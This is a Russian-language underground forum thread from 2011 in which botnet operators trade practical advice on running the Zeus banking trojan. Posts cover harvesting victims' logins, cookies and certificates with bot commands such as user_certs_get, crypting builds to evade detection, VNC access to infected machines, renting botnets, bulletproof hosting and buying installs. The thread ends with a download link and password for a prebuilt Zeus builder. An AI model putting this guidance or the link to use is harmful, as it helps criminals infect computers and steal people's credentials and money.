Zeus (вопросы и ответы)

Zeus вообще актуален, при крипте? или по любому надо spyeye ставить?

настроил зеус вечером, даже криптануть не успел.
захожу в админку с утра - 6 ботов
вопрос: откуда???

поставил зевса, пришло около 400к отчетов, боты в онлайне, в отчетах в основном кукисы, логинов и пасов почти нету. Какой скрипт надо прописать в админке, чтобы програбить пасы и логины. Или же необходимо делать инжекты для определенных сайтов? Заранее благодарен, если подскажете правильное направление!

stink, если стучат левые боты - удаляй нафиг и ставь на те айпишники бан. То тебя "пасут" или же ты поставил "прошитый" ботнет.
stiw, при грамотном крипте актуален и ещё как! Смотря какая версия.
GAD, зевс - это уже изначально формграббер. Инжекты - это другая песня. Для того, чтобы тебе приходили логины и пассы не обязательно ставить инжекты. Я так понимаю ты новичек в этом деле. Чтобы подсказать тебе по существу мне надо знать какая версия бота у тебя.

а есть версии старше 2.0.8.9?
Есть самоделки, и если учесть, что исходники в свободном доступе, таких версий должно быть уже приличное количество. Любой может тупо изменить номер версии и кричать что у него какая-нибудь новейшая доработанная версия. От автора последняя была 2.0.8.9

Есть самоделки, и если учесть, что исходники в свободном доступе, таких версий должно быть уже приличное количество. Любой может тупо изменить номер версии и кричать что у него какая-нибудь новейшая доработанная версия. От автора последняя была 2.0.8.9
Полностью прав. На експлоите уже есть якобы 2.1.0.1:D. И ещё какой то Ice9 построенный на сорцах зевса и толкают его за 300-500 у.е:)

Last edited:
Как вытащить с жертвы серты если в паблик версии выключен vnc и есть только скрипты?

Команда user_certs_get ничего не стащила, хотя серты есть в ослике....

помогите плиз....

Как вытащить с жертвы серты если в паблик версии выключен vnc и есть только скрипты?

Команда user_certs_get ничего не стащила, хотя серты есть в ослике....

помогите плиз....
Какая версия зевса?
Может не верно настройки задал типа лимит и тд.

Версия бота, 2.0.8.9
Задаю скрипт user_certs_get
1 18.07.2011 08:42:32 Отправлено *****768FB46B0E00 2.0.8.9 Sended
2 18.07.2011 08:42:32 Исполнено ********768FB46B0E00 2.0.8.9 OK.

Сертов не наблюдаю(((
хотя по кукам ясно видно что они есть в ослике
и ещё вопрос - если серт хранится на флешке, зверек же должен его вытаскивать

Last edited:
Версия бота, 2.0.8.9
Задаю скрипт user_certs_get
1 18.07.2011 08:42:32 Отправлено *****768FB46B0E00 2.0.8.9 Sended
2 18.07.2011 08:42:32 Исполнено ********768FB46B0E00 2.0.8.9 OK.

Сертов не наблюдаю(((
хотя по кукам ясно видно что они есть в ослике
и ещё вопрос - если серт хранится на флешке, зверек же должен его вытаскивать
files\*имя ботнета*\папки с файлами\ - если нету знач не отправил(

Если на флешке то нет, если не ошибаюсь он тащит сохранённые в системе серты

подскажите пожалуйста!
бот находится в онлайне, статус в NAT
не могу подключиться по внс, потому что не выполняется скрипт подключения к дедику. Подскажите как можно подключится к боту по vnc или это невозможно?

Задам нубский вопрос наверное. Если я в аренду возьму ботнет, как проверить что он на сторону не будет стучать ?

Задам нубский вопрос наверное. Если я в аренду возьму ботнет, как проверить что он на сторону не будет стучать ?
ты про билд? Пройдись сниффером, да какой смысл ща брать в ZEUS в аренду :eek: ?

ты про билд? Пройдись сниффером, да какой смысл ща брать в ZEUS в аренду :eek: ?

Я в этом не силен пока что, все еще разбираюсь. Просто один предложил в аренду взять. Объясни если не трудно почему его не стоит брать ?

а смысл брать в аренду? зевс уже в паблике, аренда настроенного ботнета выйдет дороже абузоустойчивого хостинга. главное - найти хорошего селлера загрузок

а смысл брать в аренду? зевс уже в паблике, аренда настроенного ботнета выйдет дороже абузоустойчивого хостинга. главное - найти хорошего селлера загрузок

как правило за настройку не берут .
только за хостин

кто видел исходники данной малварины, как их собрать еп та ... Уже вторые сутки ебусь чтобы собрать билдер, не как не получается... кто собирал отпишитесь в ПМ

кто видел исходники данной малварины, как их собрать еп та ... Уже вторые сутки ебусь чтобы собрать билдер, не как не получается... кто собирал отпишитесь в ПМ

лучше уж поздно чем никогда :)
http://www.sendspace.com/file/dpe4lk
pass: k0d.cc
в папке /output/ уже собранный билдер